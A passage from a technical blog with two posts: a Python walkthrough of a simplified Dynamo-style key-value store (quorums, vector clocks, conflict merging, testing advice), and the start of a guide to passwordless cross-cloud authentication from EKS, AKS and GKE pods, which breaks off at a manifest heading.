        """
        Return the first N nodes clockwise from key's hash position.

        These are the nodes responsible for storing this key.
        The first node in the list is the coordinator — it receives
        the client request and fans out to the others.
        """
        if not self.nodes:
            return []

        key_hash = self._hash(key)

        # Find the first node whose token is >= key's hash (clockwise)
        start_idx = 0
        for i, node in enumerate(self.nodes):
            if node.token >= key_hash:
                start_idx = i
                break
            # If key_hash is greater than all tokens, wrap around to node 0
            else:
                start_idx = 0

        # Walk clockwise, collecting N unique nodes
        preference_list = []
        for i in range(len(self.nodes)):
            idx = (start_idx + i) % len(self.nodes)
            preference_list.append(self.nodes[idx])
            if len(preference_list) == n:
                break

        return preference_list

Part 5: The Dynamo Coordinator

This is the heart of the system — the logic that handles client requests, fans out to replicas, waits for quorum, and detects conflicts. Study this carefully; it's where all the earlier concepts converge.

class SimplifiedDynamo:
    """
    Coordinates reads and writes across a cluster of DynamoNodes.

    Any node can act as coordinator for any request — there's no
    dedicated master. The coordinator is simply whichever node
    receives the client request (or the first node in the preference
    list, if using partition-aware routing).

    Configuration:
      N = total replicas per key
      R = minimum nodes that must respond to a read (read quorum)
      W = minimum nodes that must acknowledge a write (write quorum)
    """

    def __init__(self, nodes: list[DynamoNode], N: int = 3, R: int = 2, W: int = 2):
        self.N = N
        self.R = R
        self.W = W
        self.ring = ConsistentHashRing(nodes)

    # ------------------------------------------------------------------ #
    #  WRITE                                                               #
    # ------------------------------------------------------------------ #

    def put(self, key: str, value: object,
            context: VectorClock | None = None) -> VectorClock:
        """
        Write a key-value pair to N replicas, wait for W ACKs.

        The 'context' is the vector clock from a previous read.
        Always pass context when updating an existing key — it tells
        Dynamo which version you're building on top of, so it can
        detect whether your write is concurrent with anything else.

        Returns the new vector clock, which the caller should store
        and pass back on future writes to this key.

        Raises: RuntimeError if fewer than W nodes acknowledged.
        """
        preference_list = self.ring.get_preference_list(key, self.N)
        if not preference_list:
            raise RuntimeError("No nodes available")

        # The coordinator is always the first node in the preference list.
        coordinator = preference_list[0]

        # Increment the coordinator's counter in the vector clock.
        # If no context was provided (brand new key), start a fresh clock.
        base_clock = context if context is not None else VectorClock()
        new_clock = base_clock.increment(coordinator.node_id)

        versioned = VersionedValue(value=value, vector_clock=new_clock)

        # Fan out to all N replicas.
        # In a real system these would be concurrent RPC calls.
        # Here we call them sequentially for simplicity.
        ack_count = 0
        for node in preference_list:
            success = node.write(key, versioned)
            if success:
                ack_count += 1

        # Only need W ACKs to declare success.
        # The remaining replicas are updated asynchronously (or via
        # hinted handoff if they were down).
        if ack_count < self.W:
            raise RuntimeError(
                f"Write quorum not met: got {ack_count} ACKs, needed {self.W}"
            )

        print(f"[PUT] key={key!r}  value={value!r}  clock={new_clock}  "
              f"({ack_count}/{self.N} nodes wrote)")
        return new_clock

    # ------------------------------------------------------------------ #
    #  READ                                                                #
    # ------------------------------------------------------------------ #

    def get(self, key: str) -> list[VersionedValue]:
        """
        Read a key from N replicas, wait for R responses, reconcile.

        Returns a LIST of VersionedValues:
          - Length 1  → clean read, no conflict
          - Length >1 → concurrent versions detected; application must merge

        After reading, the caller should:
          1. If no conflict: use the single value normally.
          2. If conflict: merge the values using application logic,
             then call put() with the merged value and the merged
             vector clock as context. This "closes" the conflict.

        Read repair happens in the background: any replica that returned
        a stale version is silently updated with the latest version.
        """
        preference_list = self.ring.get_preference_list(key, self.N)

        # Collect responses from all N nodes
        all_versions: list[VersionedValue] = []
        responding_nodes: list[tuple[DynamoNode, list[VersionedValue]]] = []

        for node in preference_list:
            result = node.read(key)
            if result is not None:   # None means the node is down
                all_versions.extend(result)
                responding_nodes.append((node, result))

        if len(responding_nodes) < self.R:
            raise RuntimeError(
                f"Read quorum not met: got {len(responding_nodes)} responses, needed {self.R}"
            )

        # Reconcile: discard any version that is strictly dominated
        # (i.e., is a causal ancestor of) another version.
        # What remains is the set of concurrent versions.
        reconciled = self._reconcile(all_versions)

        # Background read repair: if any node returned something older
        # than the reconciled result, send it the latest version.
        # (Simplified: only meaningful when there's a single winner.)
        if len(reconciled) == 1:
            latest = reconciled[0]
            for node, versions in responding_nodes:
                if not versions or versions[0].vector_clock != latest.vector_clock:
                    node.write(key, latest)   # Repair silently in background

        status = "clean" if len(reconciled) == 1 else f"CONFLICT ({len(reconciled)} versions)"
        print(f"[GET] key={key!r}  status={status}  "
              f"({len(responding_nodes)}/{self.N} nodes responded)")

        return reconciled

    # ------------------------------------------------------------------ #
    #  INTERNAL: VERSION RECONCILIATION                                   #
    # ------------------------------------------------------------------ #

    def _reconcile(self, versions: list[VersionedValue]) -> list[VersionedValue]:
        """
        Remove any version that is a causal ancestor of another version.

        If version A's clock is dominated by version B's clock, then B
        is strictly newer — A adds no new information and can be dropped.

        Whatever remains after pruning are CONCURRENT versions: writes
        that happened without either "knowing about" the other.
        The application must merge these using domain-specific logic.

        Example:
          versions = [clock={A:1}, clock={A:2}, clock={B:1}]
          {A:2} dominates {A:1}  → drop {A:1}
          {A:2} and {B:1} are concurrent → both survive
          result = [{A:2}, {B:1}]  ← conflict! application must merge
        """
        dominated = set()
        for i, v1 in enumerate(versions):
            for j, v2 in enumerate(versions):
                if i != j and v2.vector_clock.dominates(v1.vector_clock):
                    dominated.add(i)   # v1 is an ancestor of v2, discard v1

        survivors = [v for i, v in enumerate(versions) if i not in dominated]

        # De-duplicate: identical clocks from different replicas are the same version
        seen_clocks: list[VectorClock] = []
        unique: list[VersionedValue] = []
        for v in survivors:
            if not any(v.vector_clock.clock == s.clock for s in seen_clocks):
                unique.append(v)
                seen_clocks.append(v.vector_clock)

        return unique if unique else versions

Part 6: Putting It All Together — A Demo

Let's run through a complete scenario: normal write/read, then a simulated conflict where two nodes diverge and the application must merge them.

def demo():
    # ── Setup ────────────────────────────────────────────────────────── #
    # Five nodes placed at evenly spaced positions on the hash ring.
    # In a real cluster these would span multiple datacenters.
    nodes = [
        DynamoNode("node-A", token=100),
        DynamoNode("node-B", token=300),
        DynamoNode("node-C", token=500),
        DynamoNode("node-D", token=700),
        DynamoNode("node-E", token=900),
    ]
    dynamo = SimplifiedDynamo(nodes, N=3, R=2, W=2)

    print("=" * 55)
    print("SCENARIO 1: Normal write and read (no conflict)")
    print("=" * 55)

    # Write the initial shopping cart
    ctx = dynamo.put("cart:user-42", {"items": ["shoes"]})

    # Read it back — should be a clean single version
    versions = dynamo.get("cart:user-42")
    print(f"Read result: {versions[0].value}\n")

    # Update the cart, passing the context from our earlier read.
    # The context tells Dynamo "this write builds on top of clock ctx".
    ctx = dynamo.put("cart:user-42", {"items": ["shoes", "jacket"]}, context=ctx)
    versions = dynamo.get("cart:user-42")
    print(f"After update: {versions[0].value}\n")

    print("=" * 55)
    print("SCENARIO 2: Simulated conflict — two concurrent writes")
    print("=" * 55)

    # Write the base version
    base_ctx = dynamo.put("cart:user-99", {"items": ["hat"]})

    # Now simulate a network partition:
    # node-A and node-B can't talk to each other.
    # We model this by writing directly to individual nodes.

    pref_list = dynamo.ring.get_preference_list("cart:user-99", 3)
    node_1, node_2, node_3 = pref_list[0], pref_list[1], pref_list[2]

    # Write 1: customer adds "scarf" via node_1 (e.g., their laptop)
    clock_1 = base_ctx.increment(node_1.node_id)
    node_1.write("cart:user-99", VersionedValue({"items": ["hat", "scarf"]}, clock_1))

    # Write 2: customer adds "gloves" via node_2 (e.g., their phone)
    # This write also descends from base_ctx, not from clock_1.
    # Neither write knows about the other → they are concurrent.
    clock_2 = base_ctx.increment(node_2.node_id)
    node_2.write("cart:user-99", VersionedValue({"items": ["hat", "gloves"]}, clock_2))

    # Read — coordinator sees two concurrent versions and surfaces the conflict
    versions = dynamo.get("cart:user-99")

    if len(versions) > 1:
        print(f"\nConflict detected! {len(versions)} concurrent versions:")
        for i, v in enumerate(versions):
            print(f"  Version {i+1}: {v.value}  clock={v.vector_clock}")

        # Application-level resolution: union merge (Amazon's shopping cart strategy)
        # Merge items: take the union so no addition is lost
        all_items = set()
        merged_clock = versions[0].vector_clock
        for v in versions:
            all_items.update(v.value["items"])
            merged_clock = merged_clock.merge(v.vector_clock)

        merged_value = {"items": sorted(all_items)}
        print(f"\nMerged result: {merged_value}")

        # Write the resolved version back with the merged clock as context.
        # This "closes" the conflict — future reads will see a single version.
        final_ctx = dynamo.put("cart:user-99", merged_value, context=merged_clock)

        versions = dynamo.get("cart:user-99")
        print(f"\nAfter resolution: {versions[0].value}")
        assert len(versions) == 1, "Should be a single version after merge"


if __name__ == "__main__":
    demo()

Expected output:

=======================================================
SCENARIO 1: Normal write and read (no conflict)
=======================================================
[PUT] key='cart:user-42'  value={'items': ['shoes']}  clock=VectorClock({'node-A': 1})  (3/3 nodes wrote)
[GET] key='cart:user-42'  status=clean  (3/3 nodes responded)
Read result: {'items': ['shoes']}

[PUT] key='cart:user-42'  value={'items': ['shoes', 'jacket']}  clock=VectorClock({'node-A': 2})  (3/3 nodes wrote)
[GET] key='cart:user-42'  status=clean  (3/3 nodes responded)
After update: {'items': ['shoes', 'jacket']}

=======================================================
SCENARIO 2: Simulated conflict — two concurrent writes
=======================================================
[PUT] key='cart:user-99'  value={'items': ['hat']}  clock=VectorClock({'node-A': 1})  (3/3 nodes wrote)

[GET] key='cart:user-99'  status=CONFLICT (2 versions)  (3/3 nodes responded)

Conflict detected! 2 concurrent versions:
  Version 1: {'items': ['hat', 'scarf']}  clock=VectorClock({'node-A': 2})
  Version 2: {'items': ['hat', 'gloves']}  clock=VectorClock({'node-A': 1, 'node-B': 1})

Merged result: {'items': ['gloves', 'hat', 'scarf']}
[PUT] key='cart:user-99'  value={'items': ['gloves', 'hat', 'scarf']}  ...  (3/3 nodes wrote)
[GET] key='cart:user-99'  status=clean  (3/3 nodes responded)

After resolution: {'items': ['gloves', 'hat', 'scarf']}

What to notice: In Scenario 2, the coordinator correctly identifies that {'node-A': 2} and {'node-A': 1, 'node-B': 1} are neither equal nor in a dominance relationship — neither is an ancestor of the other — so both are surfaced as concurrent. The application then takes responsibility for merging them and writing back a resolved version with the merged clock.

Key Lessons for System Design

After working with Dynamo-inspired systems for years, here are my key takeaways:

1. Always-On Beats Strongly-Consistent

For user-facing applications, availability almost always wins. Users will tolerate seeing slightly stale data. They won't tolerate "Service Unavailable."

2. Application-Level Reconciliation is Powerful

Don't be afraid to push conflict resolution to the application. The application understands the business logic and can make smarter decisions than the database ever could.

3. Tunable Consistency is Essential

One size doesn't fit all. Shopping cart additions need high availability (W=1). Financial transactions need stronger guarantees (W=N). The ability to tune this per-operation is incredibly valuable.

4. The 99.9th Percentile Matters More Than Average

Focus your optimization efforts on tail latencies. That's what users actually experience during peak times.

5. Gossip Protocols Scale Beautifully

Decentralized coordination via gossip eliminates single points of failure and scales to thousands of nodes.

When NOT to Use Dynamo-Style Systems

Be honest about trade-offs. Don't use this approach when:

Strong consistency is required (financial transactions, inventory management)
Complex queries are needed (reporting, analytics, joins)
Transactions span multiple items (Dynamo is single-key operations only)
Your team can't handle eventual consistency (if developers don't understand vector clocks and conflict resolution, you'll have problems)

Conclusion

Dynamo represents a fundamental shift in how we think about distributed systems. By embracing eventual consistency and providing tunable trade-offs, it enables building systems that scale to massive sizes while maintaining high availability.

The paper's lessons have influenced an entire generation of distributed databases. Whether you're using Cassandra, Riak, or DynamoDB, you're benefiting from the insights first published in this paper.

As engineers, our job is to understand these trade-offs deeply and apply them appropriately. Dynamo gives us a powerful tool, but like any tool, it's only as good as our understanding of when and how to use it.

Appendix: Design Problems and Approaches

Three open-ended problems that come up in system design interviews and real engineering work. Think through each before reading the discussion.

Problem 1: Conflict Resolution for a Collaborative Document Editor

The problem: You're building something like Google Docs backed by a Dynamo-style store. Two users edit the same paragraph simultaneously. How do you handle the conflict?

Why shopping cart union doesn't work here: The shopping cart strategy (union of all items) is only safe because adding items is commutative — {A} ∪ {B} = {B} ∪ {A}. Text editing is not commutative. If User A deletes a sentence and User B edits the middle of it, the union of their changes is meaningless or contradictory.

The right approach: Operational Transformation (OT) or CRDTs

The industry solution is to represent the document not as a blob of text, but as a sequence of operations, and to transform concurrent operations so they can both be applied without conflict:

User A's operation: delete(position=50, length=20)
User B's operation: insert(position=60, text="new sentence")

Without OT: B's insert position (60) is now wrong because A deleted 20 chars.
With OT:    Transform B's operation against A's:
            B's insert position shifts to 40 (60 - 20).
            Both operations now apply cleanly.

The conflict resolution strategy for the Dynamo layer would be:

Store operations (not full document snapshots) as the value for each key.
On conflict, collect all concurrent operation lists from each version.
Apply OT to merge them into a single consistent operation log.
Write the merged log back with the merged vector clock as context.

What to store in Dynamo: The operation log per document segment, not the rendered text. This makes merges deterministic and lossless.

Real-world reference: This is essentially how Google Docs, Notion, and Figma work. Their storage layers use either OT or a variant of CRDTs (Conflict-free Replicated Data Types), which are data structures mathematically guaranteed to merge without conflicts regardless of operation ordering.

Problem 2: Choosing N, R, W for Different Use Cases

The problem: What configuration would you pick for (a) a session store, (b) a product catalog, (c) user profiles?

The right way to think about this: identify the failure mode that costs more — a missed write (data loss) or a rejected write (unavailability). Then pick quorum values accordingly.

Session store — prioritize availability

Sessions are temporary and user-specific. If a user's session is briefly stale or lost, they get logged out and log back in. That's annoying but not catastrophic. You never want to reject a session write.

N=3, R=1, W=1

Rationale:
- W=1: Accept session writes even during heavy failures.
        A user can't log in if their session write is rejected.
- R=1: Read from any single node. Stale session data is harmless.
- N=3: Still replicate to 3 nodes for basic durability.

Trade-off accepted: Stale session reads are possible but inconsequential.

Product catalog — prioritize read performance and consistency

Product data is written rarely (by ops teams) but read millions of times per day. Stale prices or descriptions are problematic. You want fast, consistent reads.

N=3, R=2, W=3

Rationale:
- W=3: All replicas must confirm a catalog update before it's live.
        A price change half-published is worse than a brief write delay.
- R=2: Read quorum overlap with W=3 guarantees fresh data.
        Acceptable: catalog writes are rare, so write latency doesn't matter.
- N=3: Standard replication for durability.

Trade-off accepted: Writes are slow and fail if any node is down.
                    Acceptable because catalog updates are infrequent.

User profiles — balanced

Profile data (name, email, preferences) is moderately important. A stale profile is annoying but not dangerous. A rejected update (e.g., user can't update their email) is a real problem.

N=3, R=2, W=2

Rationale:
- The classic balanced configuration.
- R + W = 4 > N = 3, so quorums overlap: reads will see the latest write.
- Tolerates 1 node failure for both reads and writes.
- Appropriate for data that matters but doesn't require strict consistency.

Trade-off accepted: A second simultaneous node failure will cause errors.
                    Acceptable for non-critical user data.

Decision framework summary:

Priority	R	W	When to use
Max availability	1	1	Sessions, ephemeral state, click tracking
Balanced	2	2	User profiles, preferences, soft state
Consistent reads	2	3	Catalogs, config, rarely-written reference data
Highest consistency	3	3	Anywhere you need R+W > N with zero tolerance for stale reads (still not linearizable)

Problem 3: Testing a Dynamo-Style System Under Partition Scenarios

The problem: How do you verify that your system actually behaves correctly when nodes fail and partitions occur?

This is one of the hardest problems in distributed systems testing because the bugs only appear in specific interleavings of concurrent events that are difficult to reproduce deterministically.

Layer 1: Unit tests for the logic in isolation

Before testing distributed behavior, verify the building blocks independently. Vector clock comparison logic, conflict detection, and reconciliation functions can all be tested with pure unit tests — no networking needed.

def test_concurrent_clocks_detected_as_conflict():
    clock_a = VectorClock({"node-A": 2})
    clock_b = VectorClock({"node-B": 2})
    assert not clock_a.dominates(clock_b)
    assert not clock_b.dominates(clock_a)
    # Both survive reconciliation → conflict correctly detected

def test_ancestor_clock_is_discarded():
    old_clock = VectorClock({"node-A": 1})
    new_clock = VectorClock({"node-A": 3})
    assert new_clock.dominates(old_clock)
    # old_clock should be pruned during reconciliation

Layer 2: Deterministic fault injection

Rather than hoping failures happen in the right order during load testing, inject them deliberately and repeatably. In the demo implementation above, node.down = True is a simple version of this. In production systems, libraries like Jepsen or Chaos Monkey do this at the infrastructure level.

Key scenarios to test:

Scenario A: Write succeeds with W=2, third replica is down.
  → Verify: the data is readable after the down node recovers.
  → Verify: no data loss occurred.

Scenario B: Two nodes accept concurrent writes to the same key.
  → Verify: the next read surfaces exactly 2 conflicting versions.
  → Verify: after the application writes a merged version, the next read is clean.

Scenario C: Node goes down mid-write (wrote to W-1 nodes).
  → Verify: the write is correctly rejected (RuntimeError).
  → Verify: no partial writes are visible to readers.

Scenario D: All N nodes recover after a full partition.
  → Verify: no data was lost across the cluster.
  → Verify: vector clocks are still meaningful (no spurious conflicts).

Layer 3: Property-based testing

Instead of writing individual test cases, define invariants that must always hold and generate thousands of random operation sequences to try to violate them:

# Invariant: after any sequence of writes and merges, a final get()
# should always return exactly one version (no unresolved conflicts).

# Invariant: a value written with a context derived from a previous read
# should never produce a conflict with that read's version
# (it should dominate it).

# Invariant: if R + W > N, a value written successfully should always
# be visible in the next read (read-your-writes, absent concurrent writes).

Tools like Hypothesis (Python) let you express these invariants and automatically find counterexamples.

Layer 4: Linearizability checkers

For the highest confidence, record every operation's start time, end time, and result during a fault injection test, then feed the history to a linearizability checker like Knossos. It will tell you whether any observed history is consistent with a correct sequential execution — even for an eventually-consistent system operating within its stated guarantees.

Written from the trenches of distributed systems. Battle-tested insights, zero hand-waving.

Originally published at https://platformwale.blog

Cross-Cloud Authentication in Kubernetes: A Comprehensive Guide to IRSA, Workload Identity, and Federated Identity

Piyush Jajoo — Fri, 13 Feb 2026 00:32:27 +0000

Introduction

In modern cloud-native architectures, it's increasingly common to run workloads in one cloud provider while needing to access resources in another. Whether you're running a multi-cloud strategy, migrating between providers, or building a distributed system, your Kubernetes pods need secure, passwordless authentication across AWS, Azure, and GCP.

This guide demonstrates how to implement cross-cloud authentication using industry best practices:

AWS IRSA (IAM Roles for Service Accounts)
Azure Workload Identity
GCP Workload Identity Federation

We'll cover three real-world scenarios:

Pods running in EKS authenticating to AWS, Azure, and GCP
Pods running in AKS authenticating to AWS, Azure, and GCP
Pods running in GKE authenticating to AWS, Azure, and GCP

Important Note: These scenarios rely on Kubernetes Bound Service Account Tokens (available in Kubernetes 1.24+). Legacy auto-mounted tokens will not work for federation.

Prerequisites
- Required Tools
- Cloud Accounts
Cluster Setup
- Cluster Cleanup
Why Use Workload Identity Instead of Static Credentials?
How Workload Identity Federation Works
Understanding Token Flow Differences
- Understanding Token Audience in Cross-Cloud Authentication
Scenario 1: Pods Running in EKS
- Architecture Overview
- 1.1 Authenticating to AWS (Native IRSA)
- 1.2 Authenticating to Azure from EKS
- 1.3 Authenticating to GCP from EKS
- Scenario 1 Cleanup
Scenario 2: Pods Running in AKS
- Architecture Overview
- 2.1 Authenticating to Azure (Native Workload Identity)
- 2.2 Authenticating to AWS from AKS
- 2.3 Authenticating to GCP from AKS
- Scenario 2 Cleanup
Scenario 3: Pods Running in GKE
- Architecture Overview
- 3.1 Authenticating to GCP (Native Workload Identity)
- 3.2 Authenticating to AWS from GKE
- 3.3 Authenticating to Azure from GKE
- Scenario 3 Cleanup
Security Best Practices
Production Hardening
Performance Considerations
Comparison Matrix
Migration Guide
Conclusion
- Final Cleanup

Prerequisites

Before experimenting with the samples for cross-cloud authentication in this blog post, you'll need:

Required Tools

kubectl (v1.24+)
aws CLI (v2.x) and eksctl
az CLI (v2.50+)
gcloud CLI (latest)
jq (for JSON processing)

Cloud Accounts

AWS account with appropriate IAM permissions
Azure subscription with Owner or User Access Administrator role
GCP project with Owner or IAM Admin role

Cluster Setup

This section provides commands to create Kubernetes clusters on each cloud provider with OIDC/Workload Identity enabled. If you already have clusters, skip to the scenario sections.

# EKS Cluster (~15-20 minutes)
export AWS_PROFILE=<your aws profile where you want to create the cluster>
eksctl create cluster \
  --name my-eks-cluster \
  --region us-east-1 \
  --nodegroup-name standard-workers \
  --node-type t3.medium \
  --nodes 2 \
  --with-oidc \
  --managed

# AKS Cluster (~5-10 minutes)
# azure login and select the subscription where you want to work
az login
az group create --name my-aks-rg --location eastus2

az aks create \
  --resource-group my-aks-rg \
  --name my-aks-cluster \
  --node-count 2 \
  --node-vm-size Standard_D2s_v3 \
  --enable-managed-identity \
  --enable-oidc-issuer \
  --enable-workload-identity \
  --network-plugin azure \
  --generate-ssh-keys

az aks get-credentials --resource-group my-aks-rg --name my-aks-cluster --file my-aks-cluster.yaml

# GKE Cluster (~5-8 minutes)
gcloud auth login
gcloud config set project YOUR_PROJECT_ID

gcloud services enable container.googleapis.com

gcloud container clusters create my-gke-cluster \
  --region=us-central1 \
  --num-nodes=1 \
  --enable-ip-alias \
  --workload-pool=YOUR_PROJECT_ID.svc.id.goog \
  --release-channel=regular

KUBECONFIG=my-gke-cluster.yaml gcloud container clusters get-credentials my-gke-cluster --region=us-central1

# Verify clusters, make sure your context is set to the newly created clusters
kubectl get nodes

Cluster Cleanup

# Delete EKS
eksctl delete cluster --name my-eks-cluster --region us-east-1

# Delete AKS
az group delete --name my-aks-rg --yes --no-wait

# Delete GKE
gcloud container clusters delete my-gke-cluster --region us-central1 --quiet

Why Use Workload Identity Instead of Static Credentials?

Traditional approaches using static credentials (API keys, service account keys, access tokens) have significant drawbacks:

Security risks: Credentials can be leaked, stolen, or compromised
Rotation complexity: Manual credential rotation is error-prone
Audit challenges: Difficult to track which workload used which credentials
Compliance issues: Violates principle of least privilege

Workload identity federation solves these problems by:

✅ No static credentials: Tokens are automatically generated and short-lived

✅ Automatic rotation: No manual intervention required

✅ Fine-grained access control: Each pod gets only the permissions it needs

✅ Better auditability: Cloud provider logs show which Kubernetes service account made the request

✅ Standards-based: Uses OpenID Connect (OIDC) for trust establishment

How Workload Identity Federation Works

All three cloud providers use a similar pattern based on OIDC trust:

The flow:

Pod requests a service account token from Kubernetes
Kubernetes issues a signed JWT with claims (namespace, service account, audience)
Pod exchanges this JWT with the cloud provider's IAM service
Cloud provider validates the JWT against the OIDC provider
Cloud provider returns temporary credentials/tokens
Pod uses these credentials to access cloud resources

Understanding Token Flow Differences

While all three providers use OIDC federation, their implementation details differ:

Cloud Provider	Validates OIDC Directly?	Uses STS/Token Service?	Mechanism
AWS	Yes (STS validates OIDC)	Yes (AWS STS)	AssumeRoleWithWebIdentity
Azure	Yes (Entra ID validates OIDC)	Yes (Azure AD token endpoint)	Federated credential match → access token
GCP	Yes (STS validates via WI Pool)	Yes (GCP STS)	External account → STS → SA impersonation

Key Differences:

AWS: Direct OIDC validation via STS, returns temporary AWS credentials (AccessKeyId, SecretAccessKey, SessionToken)
Azure: Entra ID validates OIDC token against federated credential configuration, returns Azure AD access token (OAuth 2.0 bearer token)
GCP: Two-step process - STS validates via Workload Identity Pool, then impersonates service account to get access token

Understanding Token Audience in Cross-Cloud Authentication

When authenticating from one cloud provider to other cloud providers, you must configure the token audience claim correctly. Each cloud provider has specific requirements:

Token Audience Best Practices

Source Cluster	Target Cloud	Recommended Audience	Why
AKS	Azure (native)	Automatic via webhook	Native integration handles this
AKS	AWS	`sts.amazonaws.com`	AWS best practice for STS
AKS	GCP	WIF Pool-specific or custom	GCP validates via WIF configuration
EKS	AWS (native)	Automatic	Native IRSA integration
EKS	Azure	`api://AzureADTokenExchange`	Azure federated credential requirement
EKS	GCP	WIF Pool-specific	GCP standard
GKE	GCP (native)	Automatic	Native Workload Identity
GKE	AWS	`sts.amazonaws.com`	AWS best practice
GKE	Azure	`api://AzureADTokenExchange`	Azure requirement

Approach 1: Dedicated Tokens per Cloud (Recommended for Production)

Use separate projected service account tokens with cloud-specific audiences:

Advantages:

✅ Follows each cloud provider's best practices
✅ Clearer audit trails (audience claim shows target cloud)
✅ Better security posture (principle of least privilege)
✅ Easier troubleshooting (explicit token-to-cloud mapping)
✅ No confusion about which cloud a token is for

Implementation:

volumes:
  - name: aws-token
    projected:
      sources:
        - serviceAccountToken:
            path: aws-token
            audience: sts.amazonaws.com
  - name: azure-token
    projected:
      sources:
        - serviceAccountToken:
            path: azure-token
            audience: api://AzureADTokenExchange
  - name: gcp-token
    projected:
      sources:
        - serviceAccountToken:
            path: gcp-token
            audience: //iam.googleapis.com/projects/PROJECT_NUMBER/...

Approach 2: Shared Token (Acceptable for Testing/Demos)

Reuse a single token with one audience for multiple clouds:

Use Case: Simplifying demos or when managing multiple projected tokens is impractical

Limitations:

⚠️ Violates AWS best practices when using Azure audience
⚠️ Less clear in audit logs
⚠️ Potential security concerns in highly regulated environments
⚠️ May not work in all scenarios (some clouds reject non-standard audiences)

This guide uses Approach 1 (dedicated tokens) for all cross-cloud scenarios to demonstrate production-ready patterns.

Scenario 1: Pods Running in EKS

Note: After completing this scenario, make sure to clean up the resources using the cleanup steps at the end of this section before proceeding to the next scenario to avoid resource conflicts and unnecessary costs.

Architecture Overview

1.1 Authenticating to AWS (Native IRSA)

Setup Steps:

# 1. Create IAM OIDC provider (if not exists), in our case eks cluster was created with OIDC provider; hence no need

# 2. Get OIDC provider URL
OIDC_PROVIDER=$(aws eks describe-cluster \
  --name my-eks-cluster --region us-east-1 \
  --query "cluster.identity.oidc.issuer" \
  --output text | sed -e "s/^https:\/\///")

# 3. Create IAM role trust policy
YOUR_ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
cat > trust-policy.json <<EOF
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::${YOUR_ACCOUNT_ID}:oidc-provider/${OIDC_PROVIDER}"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "${OIDC_PROVIDER}:sub": "system:serviceaccount:default:eks-cross-cloud-sa",
          "${OIDC_PROVIDER}:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
EOF

# 4. Create IAM role
aws iam create-role \
  --role-name eks-cross-cloud-role \
  --assume-role-policy-document file://trust-policy.json

# 5. Attach permissions policy
aws iam attach-role-policy \
  --role-name eks-cross-cloud-role \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

Kubernetes Manifest:

Submit the manifest below to validate the Scenario 1.1, if authentication is working you will see success logs as shown below -

# scenario1-1-eks-to-aws.yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: eks-cross-cloud-sa
  namespace: default
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::YOUR_AWS_ACCOUNT_ID:role/eks-cross-cloud-role
---
apiVersion: v1
kind: Pod
metadata:
  name: eks-aws-test
  namespace: default
spec:
  serviceAccountName: eks-cross-cloud-sa
  restartPolicy: Never
  containers:
  - name: aws-test
    image: python:3.11-slim
    command:
      - sh
      - -c
      - |
        pip install --no-cache-dir boto3 && \
        python /app/test_aws_from_eks.py
    env:
      - name: AWS_REGION
        value: us-east-1
    volumeMounts:
      - name: app-code
        mountPath: /app
  volumes:
    - name: app-code
      configMap:
        name: aws-test-code
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-test-code
  namespace: default
data:
  test_aws_from_eks.py: |
    # Code will be provided below

Test Code (Python):

# test_aws_from_eks.py
import boto3
import sys

def test_aws_access():
    """Test AWS S3 access using IRSA"""
    try:
        # SDK automatically uses IRSA credentials
        s3_client = boto3.client('s3')

        # List buckets to verify access
        response = s3_client.list_buckets()

        print("AWS Authentication successful!")
        print(f"Found {len(response['Buckets'])} S3 buckets:")
        for bucket in response['Buckets'][:5]:
            print(f"  - {bucket['Name']}")

        # Get caller identity
        sts_client = boto3.client('sts')
        identity = sts_client.get_caller_identity()
        print(f"\nAuthenticated as: {identity['Arn']}")

        return True
    except Exception as e:
        print(f"AWS Authentication failed: {str(e)}")
        return False

if __name__ == "__main__":
    success = test_aws_access()
    sys.exit(0 if success else 1)

Success Logs

If you see logs like below for the pods kubectl logs -f -n default eks-aws-test, it means the EKS to AWS Authentication worked.

AWS Authentication successful!
Found <number of buckets> S3 buckets:
  - bucket-1
  - bucket-2
  - ...

Authenticated as: arn:aws:sts::YOUR_AWS_ACCOUNT_ID:assumed-role/eks-cross-cloud-role/botocore-session-<some random number>

1.2 Authenticating to Azure from EKS

Cross-Cloud Authentication Flow:

Note: We use api://AzureADTokenExchange as audience to reuse the projected token across Azure and AWS. In production dedicated to Azure only, this is the standard audience for Azure Workload Identity.

Setup Steps:

# Make sure you have done  `az login` and set the subscription you want to work in before proceeding with next steps

# 1. Get EKS OIDC issuer URL
OIDC_ISSUER=$(aws eks describe-cluster \
  --name my-eks-cluster --region us-east-1 \
  --query "cluster.identity.oidc.issuer" \
  --output text)

# 2. Create Azure AD application
az ad app create \
  --display-name eks-to-azure-app

APP_ID=$(az ad app list \
  --display-name eks-to-azure-app \
  --query "[0].appId" -o tsv)

# 3. Create service principal
az ad sp create --id $APP_ID

OBJECT_ID=$(az ad sp show \
  --id $APP_ID \
  --query id -o tsv)

# 4. Create federated credential
cat > federated-credential.json <<EOF
{
  "name": "eks-federated-identity",
  "issuer": "${OIDC_ISSUER}",
  "subject": "system:serviceaccount:default:eks-cross-cloud-sa",
  "audiences": [
    "api://AzureADTokenExchange"
  ]
}
EOF

az ad app federated-credential create \
  --id $APP_ID \
  --parameters federated-credential.json

# 5. Assign Azure role (using resource-specific scope for security)
SUBSCRIPTION_ID=$(az account show --query id -o tsv)

# First create the storage account, then get its resource ID
az group create \
  --name eks-cross-cloud \
  --location eastus --subscription $SUBSCRIPTION_ID

az storage account create \
  --name ekscrosscloud \
  --resource-group eks-cross-cloud \
  --location eastus \
  --sku Standard_LRS \
  --kind StorageV2 --subscription $SUBSCRIPTION_ID

# Get storage account resource ID for proper scoping
STORAGE_ID=$(az storage account show \
  --name ekscrosscloud \
  --resource-group eks-cross-cloud \
  --query id \
  --output tsv)

az role assignment create \
  --assignee $APP_ID \
  --role "Storage Blob Data Reader" \
  --scope $STORAGE_ID

# 6. Create test container
az storage container create \
  --name test-container \
  --account-name ekscrosscloud --subscription $SUBSCRIPTION_ID \
  --auth-mode login

# find the tenant ID, you will need for yaml manifests below
TENANT_ID=$(az account show --query tenantId -o tsv)

Kubernetes Manifest:

Submit the manifest below to validate the Scenario 1.2, if authentication is working you will see success logs as shown below -

# scenario1-2-eks-to-azure.yaml
